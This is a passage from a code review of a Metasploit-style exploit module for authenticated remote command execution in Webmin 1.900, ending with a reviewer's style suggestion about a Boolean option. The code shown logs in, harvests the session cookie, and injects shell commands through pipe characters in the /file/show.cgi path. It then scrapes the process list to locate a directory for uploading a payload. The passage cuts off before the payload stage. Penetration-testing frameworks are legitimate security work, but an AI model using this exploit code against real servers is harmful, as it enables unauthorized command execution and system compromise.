modules/exploits/unix/webapp/webmin_1900_rce.rb

```diff
@@ -0,0 +1,296 @@
+    )
+  end
+
+  ##
+  # Target and input verification
+  ##
+
+  def check
+    vprint_status("Attempting to login...")
+    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
+    res = send_request_cgi(
+      {
+        'method'  => 'POST',
+        'uri'     => "/session_login.cgi",
+        'cookie'  => "testing=1",
+        'data'    => data
+      }, 25
+    )
+
+    if res && res.code == 302 && res.get_cookies =~ /sid/
+      print_good "Login successful"
+      session = res.get_cookies.split("sid=")[1].split(";")[0]
+    else
+      print_error "Service found, but login failed"
+      return Exploit::CheckCode::Detected
+    end
+
+    print_status("Attempting to execute...")
+
+    command = "echo #{rand_text_alphanumeric(rand(0..9))}"
+
+    res = send_request_cgi(
+      {
+        'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
+        'cookie'  => "sid=#{session}"
+      }, 25
+    )
+
+    if res && res.code == 200 && res.message =~ /Document follows/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  ##
+  # Exploiting phase
+  ##
+
+  def exploit
+    peer = "#{rhost}:#{rport}"
+    print_status("Attempting to login...")
+    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => "/session_login.cgi",
+        'cookie' => "testing=1",
+        'data' => data
+      }, 25
+    )
+
+    if res && res.code == 302 && res.get_cookies =~ /sid/
+      session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
+      if session && !session.empty?
+        print_good "Login successfully"
+      else
+        print_error "Authentication failed"
+        return
+      end
+    else
+      print_error "Authentication failed"
+      return
+    end
+
+    ##
+    # Directory and SSL verification for referer
+    ##
+    ps = datastore['SSL'].to_s
+    guess_dir = datastore['GUESSUPLOAD'].to_s
+    if ps == "true"
+      ssl = "https://"
+    else
+      ssl = "http://"
+    end
+
+    print_status("Target URL => #{ssl}#{peer}")
+
+    res1 = send_request_raw(
+      'method' => "POST",
+      'uri' => "/proc/index_tree.cgi?",
+      'headers' =>
+        {
+          'Referer' => "#{ssl}#{peer}/sysinfo.cgi?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{session}"
+    )
+
+    if res1 && res1.code == 200 && res1.body =~ /Running Processes/
+      print_status "Searching for directory to upload..."
+      stpdir =
+        res1
+        .body.scan(/perl.+miniserv.pl/)
+        .map { |s| s.split("perl ").last }
+        .map { |d| d.split("miniserv").first }
+        .map { |d| d.split("miniserv").first }
+      if !stpdir[0].nil?
+        dir = stpdir[0] + "file"
+        print_good("Directory to upload => #{dir}")
+      elsif guess_dir == "true" && stpdir[0].nil?
```

Comment:
`GUESSUPLOAD` is Boolean `OptBool`. No need to convert to string `to_s`.

```suggestion
      elsif guess_dir && stpdir[0].nil?
```